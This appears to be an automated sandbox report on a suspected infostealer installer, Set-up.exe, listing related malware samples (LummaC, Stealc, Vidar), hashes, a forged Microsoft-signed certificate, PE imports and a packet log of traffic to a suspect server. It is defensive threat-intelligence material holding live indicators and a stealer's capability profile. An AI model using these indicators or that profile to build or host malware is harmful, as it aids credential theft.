Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
httpbin.org	a2mNMrPxow.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	SgMuuLxOCJ.exe	Get hash	malicious	LummaC	Browse	34.226.108.155
	TNyOrM6mIM.exe	Get hash	malicious	LummaC	Browse	3.218.7.103
	FIyDwZM4OR.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	ZFttiy4Tt8.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	e62iSl0abZ.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	HGFSqmKwd5.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	A3nofpjN9A.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	QMtCX5RLOP.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	j2nLC29vCy.exe	Get hash	malicious	LummaC	Browse	3.218.7.103

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FREE-MPEIRU	XODc5nV1kC.exe	Get hash	malicious	LummaC	Browse	193.233.112.194
	BnxBRWQWhy.exe	Get hash	malicious	Stealc, Vidar	Browse	193.233.112.44
	NJna3TEAEr.exe	Get hash	malicious	Stealc, Vidar	Browse	193.233.112.44
	file.exe	Get hash	malicious	Stealc	Browse	193.233.113.184
	file.exe	Get hash	malicious	Stealc	Browse	193.233.113.184
	file.exe	Get hash	malicious	Stealc	Browse	193.233.113.184
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	193.233.113.184
	SecuriteInfo.com.Trojan.Crypt.23519.13317.exe	Get hash	malicious	Unknown	Browse	193.233.121.52
	file.exe	Get hash	malicious	DCRat	Browse	193.233.115.185
	BitTorrent-7.6.exe	Get hash	malicious	Unknown	Browse	193.233.122.71
AMAZON-AESUS	T1#U52a9#U624b1.0.1.exe	Get hash	malicious	Unknown	Browse	34.198.65.183
	https://kn0wbe4.compromisedblog.com/XZHJISTcycW1tZkROWG92Y2ZEc21laS80dzNTR2N0eEsvTDFRWGFNODdGaGtjNGo5VzRyMFRUQmFLM0grcGxUbnBSTVFhMEg2Smd3UkovaXVjaUpIcG1hZG5CQnh5aFlZTXNqNldTdm84cE5CMUtld0dCZzN4ZUFRK2lvL1FWTG92NUJsMnJ3OHFGckdTNFhnMkFUTFZFZTdKRnVJaTRuRGFKdXVyeUdCVytuQzdnMEV1ZExSMnlwWi9RPT0tLTdnZjhxQVZPbUdTdFZXVUEtLXA0bHNCNGxmeTdrdmlkWWRVcmRXRWc9PQ==?cid=2310423310	Get hash	malicious	KnowBe4	Browse	54.209.230.227
	db0fa4b8db0333367e9bda3ab68b8042.sh4.elf	Get hash	malicious	Mirai, Gafgyt	Browse	44.198.90.23
	db0fa4b8db0333367e9bda3ab68b8042.i686.elf	Get hash	malicious	Mirai, Gafgyt	Browse	44.221.106.81
	ArjM1qx3hV.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	aRxo3E278B.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	yRc7UfFif9.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	gT6IitwToH.exe	Get hash	malicious	Bdaejec	Browse	44.221.84.105
	a2mNMrPxow.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	SgMuuLxOCJ.exe	Get hash	malicious	LummaC	Browse	34.226.108.155

File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	6.2231848331240665
TrID:	Win32 Executable (generic) a (10002005/4) 99.53% InstallShield setup (43055/19) 0.43% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Set-up.exe
File size:	7'363'720 bytes
MD5:	fb412d366acb254b7870e17ea228e971
SHA1:	6217577b0421b22d98717a23b46b884481d298e7
SHA256:	db605eba071eeeb78c1aa93a018046699cca2a5260e9601f599cd96c55cccd9d
SHA512:	6e6c92c8dd38b77404ac871aa3cf7be0abca27d657d447312ea366b25af0dbd6f984931b0c5c990d04a9ffd130ae177448e847639c9f1901c415dbda5ced2968
SSDEEP:	98304:iBQu+9ZWL3Mc6js4ReDetZ5n22YtvKqbyz8Q4:qsZySg0FnBovjbG8Q4
TLSH:	CF763961EE8791F5C6C30571511AB3BF6E30AF009929CEB6CE80FB74C672B11E95E618
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....qg...............(..M..Rp..2............M...@...........................p.......p...@... ............................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4014a0
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x67711CFF [Sun Dec 29 09:57:19 2024 UTC]
TLS Callbacks:	0x7890e0, 0x789090
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	51b39aff649af7abc30a06f2362db069

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=US
Signature Validation Error:	A certificate chain could not be built to a trusted root authority
Error Number:	-2146762486
Not Before, Not After	26/08/2024 17:01:06 21/08/2025 17:01:06
Subject Chain	CN=www.microsoft.com, O=Microsoft Corporation, L=Redmond, S=WA, C=US
Version:	3
Thumbprint MD5:	E13F8785CE1066C4F3A882B77A151115
Thumbprint SHA-1:	F14A35BB462FE8292593C2ED5EA7AC719FCFD2F4
Thumbprint SHA-256:	3EC1B9E679141990B69476A586D7288E93F224B3AB9244DAA22B36FDBA2C4232
Serial:	33009F7B734DB0480411EB0BBA0000009F7B73

Entrypoint Preview

Instruction
mov dword ptr [00AD2658h], 00000001h
jmp 00007F8DF4DD42B6h
nop
mov dword ptr [00AD2658h], 00000000h
jmp 00007F8DF4DD42A6h
nop
sub esp, 1Ch
mov eax, dword ptr [esp+20h]
mov dword ptr [esp], eax
call 00007F8DF515BB16h
cmp eax, 01h
sbb eax, eax
add esp, 1Ch
ret
nop
nop
nop
nop
nop
nop
nop
nop
push ebp
mov ebp, esp
push edi
push esi
push ebx
sub esp, 1Ch
mov dword ptr [esp], 00979000h
call dword ptr [00AD49A8h]
sub esp, 04h
test eax, eax
je 00007F8DF4DD4675h
mov ebx, eax
mov dword ptr [esp], 00979000h
call dword ptr [00AD4A1Ch]
mov edi, dword ptr [00AD49BCh]
sub esp, 04h
mov dword ptr [00AD0028h], eax
mov dword ptr [esp+04h], 00979013h
mov dword ptr [esp], ebx
call edi
sub esp, 08h
mov esi, eax
mov dword ptr [esp+04h], 00979029h
mov dword ptr [esp], ebx
call edi
sub esp, 08h
mov dword ptr [008DF004h], eax
test esi, esi
je 00007F8DF4DD4613h
mov dword ptr [esp+04h], 00AD002Ch
mov dword ptr [esp], 00ACB104h
call esi
mov dword ptr [esp], 00401580h
call 00007F8DF4DD4563h
lea esp, dword ptr [ebp-0Ch]
pop ebx
pop esi

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6d4000	0x2dac	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x705600	0x688	.reloc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x6d9000	0x348fc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x6c1040	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x6d4814	0x620	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4dd0cc	0x4dd200	78b2ca06181f3b3236d06feddb3601e8	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x4df000	0x99544	0x99600	db69b9c379e8d3dbc75a0ed7117fbc10	False	0.03848945599022005	dBase III DBT, version number 0, next free block index 10, 1st item "2J{"	0.5385844035293097	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x579000	0x151e78	0x152000	f7c0eb81653796768b80228933ba159d	False	0.4208153719027367	data	6.274600384389603	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.eh_fram	0x6cb000	0x4d64	0x4e00	004401d83ac413e752439210b631a229	False	0.31946113782051283	data	4.912960490847057	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss	0x6d0000	0x3180	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6d4000	0x2dac	0x2e00	b043cc9091bb6c51cad3779275ed92c8	False	0.367866847826087	data	5.3439160182225125	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x6d7000	0x30	0x200	fe2a65d4187b984679c52ae93485940e	False	0.0625	data	0.2233456448570176	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x6d8000	0x8	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x6d9000	0x348fc	0x34a00	b179056644a8312dd5192e6bdb59ec74	False	0.4987102880047506	data	6.6555485608080565	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
ADVAPI32.dll	CryptAcquireContextA, CryptAcquireContextW, CryptCreateHash, CryptDecrypt, CryptDestroyHash, CryptDestroyKey, CryptEnumProvidersW, CryptExportKey, CryptGenRandom, CryptGetHashParam, CryptGetProvParam, CryptGetUserKey, CryptHashData, CryptReleaseContext, CryptSetHashParam, CryptSignHashW, DeregisterEventSource, RegCloseKey, RegEnumKeyExA, RegNotifyChangeKeyValue, RegOpenKeyExA, RegOpenKeyExW, RegQueryValueExA, RegisterEventSourceW, ReportEventW, SystemFunction036
bcrypt.dll	BCryptGenRandom
CRYPT32.dll	CertCloseStore, CertDuplicateCertificateContext, CertEnumCertificatesInStore, CertFindCertificateInStore, CertFreeCertificateContext, CertGetCertificateContextProperty, CertGetEnhancedKeyUsage, CertGetIntendedKeyUsage, CertOpenStore, CertOpenSystemStoreA, CertOpenSystemStoreW
GDI32.dll	BitBlt, CreateCompatibleBitmap, CreateCompatibleDC, DeleteDC, DeleteObject, GetDeviceCaps, SelectObject
gdiplus.dll	GdipGetImageEncoders, GdipGetImageEncodersSize, GdiplusShutdown, GdiplusStartup
IPHLPAPI.DLL	ConvertInterfaceIndexToLuid, ConvertInterfaceLuidToNameA, FreeMibTable, GetAdaptersAddresses, GetBestRoute2, GetUnicastIpAddressTable, if_indextoname, if_nametoindex
KERNEL32.dll	AcquireSRWLockExclusive, CancelIo, CloseHandle, CompareFileTime, ConvertFiberToThread, ConvertThreadToFiberEx, CreateEventA, CreateFiberEx, CreateFileA, CreateFileMappingA, CreateIoCompletionPort, CreateMutexA, CreateSemaphoreW, CreateThread, CreateToolhelp32Snapshot, DeleteCriticalSection, DeleteFiber, EnterCriticalSection, ExpandEnvironmentStringsA, FindClose, FindFirstFileA, FindFirstFileW, FindNextFileW, FormatMessageW, FreeLibrary, GetACP, GetConsoleMode, GetCurrentProcessId, GetCurrentThreadId, GetDiskFreeSpaceExA, GetDriveTypeA, GetEnvironmentVariableA, GetEnvironmentVariableW, GetFileAttributesA, GetFileType, GetLastError, GetLogicalDriveStringsA, GetModuleFileNameA, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetNativeSystemInfo, GetOverlappedResult, GetProcAddress, GetProcessHeap, GetQueuedCompletionStatusEx, GetStartupInfoA, GetStdHandle, GetSystemDirectoryA, GetSystemInfo, GetSystemTime, GetSystemTimeAsFileTime, GetThreadLocale, GetTickCount64, GetTickCount, GetTimeZoneInformation, GetVersion, GetVersionExA, GlobalMemoryStatusEx, HeapAlloc, HeapFree, InitializeConditionVariable, InitializeCriticalSection, IsBadReadPtr, IsDBCSLeadByteEx, K32EnumProcesses, LeaveCriticalSection, LoadLibraryA, LoadLibraryW, MapViewOfFile, MoveFileExA, MultiByteToWideChar, OpenProcess, PeekNamedPipe, PostQueuedCompletionStatus, Process32First, Process32Next, QueryFullProcessImageNameA, QueryPerformanceCounter, QueryPerformanceFrequency, ReadConsoleA, ReadConsoleW, ReadFile, RegisterWaitForSingleObject, ReleaseSRWLockExclusive, ReleaseSemaphore, SetConsoleMode, SetFileCompletionNotificationModes, SetHandleInformation, SetLastError, SetUnhandledExceptionFilter, Sleep, SleepConditionVariableCS, SleepEx, SwitchToFiber, SystemTimeToFileTime, TlsAlloc, TlsGetValue, TlsSetValue, UnmapViewOfFile, UnregisterWait, VerSetConditionMask, VerifyVersionInfoW, VirtualAlloc, VirtualFree, VirtualLock, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WaitNamedPipeA, WakeAllConditionVariable, WakeConditionVariable, WideCharToMultiByte, WriteFile, lstrlenA
msvcrt.dll	__mb_cur_max, __setusermatherr, _findclose, _fullpath, _lock, _strnicmp, _unlock, getc, islower, isxdigit, localeconv, ungetc, vfprintf, _findnext, _findfirst, _open
ole32.dll	CreateStreamOnHGlobal
SHELL32.dll	SHGetKnownFolderPath
api-ms-win-crt-convert-l1-1-0.dll	atoi, mbstowcs, strtol, strtoll, strtoul, wcstombs
api-ms-win-crt-environment-l1-1-0.dll	__p__environ, __p__wenviron, getenv
api-ms-win-crt-filesystem-l1-1-0.dll	_fstat64, _stat64, _unlink
api-ms-win-crt-heap-l1-1-0.dll	_set_new_mode, calloc, free, malloc, realloc
api-ms-win-crt-locale-l1-1-0.dll	setlocale
api-ms-win-crt-math-l1-1-0.dll	_fdopen
api-ms-win-crt-private-l1-1-0.dll	memchr, memcmp, memcpy, memmove, strchr, strrchr, strstr, wcsstr
api-ms-win-crt-runtime-l1-1-0.dll	_set_app_type, __p___argc, __p___argv, __p___wargv, __p__acmdln, __sys_errlist, __sys_nerr, _assert, _cexit, _configure_narrow_argv, _configure_wide_argv, _crt_at_quick_exit, _crt_atexit, _errno, _exit, _fpreset, _initialize_narrow_environment, _initialize_wide_environment, _initterm, _set_invalid_parameter_handler, abort, exit, raise, signal, strerror
api-ms-win-crt-stdio-l1-1-0.dll	__acrt_iob_func, __p__commode, __p__fmode, __stdio_common_vfwprintf, __stdio_common_vsprintf, __stdio_common_vsscanf, __stdio_common_vswprintf, _fileno, _fseeki64, _lseeki64, _wfopen, _write, fclose, feof, ferror, fflush, fgets, fopen, fputc, fputs, fread, fseek, ftell, fwrite, rewind, setvbuf, _write, _setmode, _read, _open, _fileno, _close
api-ms-win-crt-string-l1-1-0.dll	_strlwr_s, isspace, isupper, memset, strcat, strcmp, strcpy, strcspn, strlen, strncat, strncmp, strncpy, strpbrk, strspn, tolower, wcscat, wcscmp, wcscpy, wcslen, _wcsnicmp, _stricmp, _strdup, _strdup
api-ms-win-crt-time-l1-1-0.dll	__daylight, __timezone, __tzname, _difftime32, _difftime64, _gmtime64, _mktime64, _time32, _time64, _tzset, strftime
api-ms-win-crt-utility-l1-1-0.dll	_byteswap_uint64, bsearch, qsort, rand, srand
USER32.dll	CharUpperA, EnumDisplayMonitors, EnumWindows, FindWindowA, GetDC, GetProcessWindowStation, GetSystemMetrics, GetUserObjectInformationW, GetWindowTextA, MessageBoxW, ReleaseDC, SendMessageA
WS2_32.dll	WSACleanup, WSACloseEvent, WSACreateEvent, WSAEnumNetworkEvents, WSAEventSelect, WSAGetLastError, WSAIoctl, WSAResetEvent, WSASetEvent, WSASetLastError, WSAStartup, WSAStringToAddressW, WSAWaitForMultipleEvents, __WSAFDIsSet, accept, bind, closesocket, connect, gethostbyaddr, gethostbyname, gethostname, getpeername, getservbyname, getservbyport, getsockname, getsockopt, htonl, htons, inet_addr, inet_ntoa, ioctlsocket, listen, ntohl, ntohs, recv, recvfrom, select, send, sendto, setsockopt, shutdown, socket

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 29, 2024 16:50:58.950694084 CET	49730	443	192.168.2.4	52.73.63.247
Dec 29, 2024 16:50:58.950730085 CET	443	49730	52.73.63.247	192.168.2.4
Dec 29, 2024 16:50:58.950879097 CET	49730	443	192.168.2.4	52.73.63.247
Dec 29, 2024 16:50:58.953516006 CET	49730	443	192.168.2.4	52.73.63.247
Dec 29, 2024 16:50:58.953530073 CET	443	49730	52.73.63.247	192.168.2.4
Dec 29, 2024 16:51:01.193193913 CET	443	49730	52.73.63.247	192.168.2.4
Dec 29, 2024 16:51:01.195139885 CET	49730	443	192.168.2.4	52.73.63.247
Dec 29, 2024 16:51:01.195152998 CET	443	49730	52.73.63.247	192.168.2.4
Dec 29, 2024 16:51:01.196304083 CET	443	49730	52.73.63.247	192.168.2.4
Dec 29, 2024 16:51:01.196374893 CET	49730	443	192.168.2.4	52.73.63.247
Dec 29, 2024 16:51:01.209722042 CET	49730	443	192.168.2.4	52.73.63.247
Dec 29, 2024 16:51:01.209785938 CET	443	49730	52.73.63.247	192.168.2.4
Dec 29, 2024 16:51:01.222398043 CET	49730	443	192.168.2.4	52.73.63.247
Dec 29, 2024 16:51:01.222404957 CET	443	49730	52.73.63.247	192.168.2.4
Dec 29, 2024 16:51:01.268181086 CET	49730	443	192.168.2.4	52.73.63.247
Dec 29, 2024 16:51:01.553297997 CET	443	49730	52.73.63.247	192.168.2.4
Dec 29, 2024 16:51:01.553349972 CET	443	49730	52.73.63.247	192.168.2.4
Dec 29, 2024 16:51:01.553518057 CET	49730	443	192.168.2.4	52.73.63.247
Dec 29, 2024 16:51:01.554531097 CET	49730	443	192.168.2.4	52.73.63.247
Dec 29, 2024 16:51:01.554543018 CET	443	49730	52.73.63.247	192.168.2.4
Dec 29, 2024 16:51:02.889378071 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:03.010226965 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:03.010324001 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:03.011533022 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:03.132704973 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:03.132750988 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:03.132855892 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:03.132865906 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:03.132874012 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:03.132889032 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:03.132901907 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:03.132998943 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:03.133008003 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:03.133064985 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:03.133080959 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:03.133089066 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:03.133137941 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:03.133156061 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:03.133199930 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:03.253483057 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:03.253561974 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:03.253686905 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:03.253746986 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:03.253788948 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:03.253798008 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:03.253801107 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:03.253851891 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:03.253856897 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:03.253859997 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:03.253905058 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:03.296088934 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:03.296257973 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:03.416115999 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:03.416187048 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:03.460031033 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:03.580043077 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:03.580105066 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:03.783998966 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:03.784069061 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:04.036003113 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.036237001 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:04.139646053 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.139954090 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:04.140012026 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:04.157116890 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.157171965 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:04.260879993 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.260931969 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.260967970 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:04.260986090 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:04.261002064 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.261009932 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.261040926 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.261101961 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.261173964 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:04.261183023 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.261190891 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.261235952 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:04.261270046 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.261279106 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.261320114 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:04.261322021 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.261364937 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:04.261405945 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.261451960 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.261455059 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:04.261502028 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:04.261519909 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.261568069 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:04.261652946 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.261732101 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.261739969 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.261847973 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.261894941 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.262064934 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.262105942 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.262244940 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.262269020 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.262373924 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.262427092 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.262562990 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:04.262619972 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.262666941 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:04.262672901 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.262681961 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.262725115 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:04.262785912 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.262826920 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:04.262844086 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.262892008 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:04.262957096 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.262998104 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:04.278017044 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.278122902 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:04.319989920 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.320215940 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:04.381990910 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.382035017 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:04.382074118 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.382126093 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:04.382186890 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.382234097 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.382236004 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:04.382323027 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.382438898 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.382556915 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.382648945 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.382656097 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.382699013 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.382813931 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.382821083 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.382855892 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.382935047 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.382999897 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.383114100 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.383121967 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.383414030 CET	49731	80	192.168.2.4	193.233.84.212
Dec 29, 2024 16:51:04.383513927 CET	80	49731	193.233.84.212	192.168.2.4
Dec 29, 2024 16:51:04.383548975 CET	80	49731	193.233.84.212	192.168.2.4
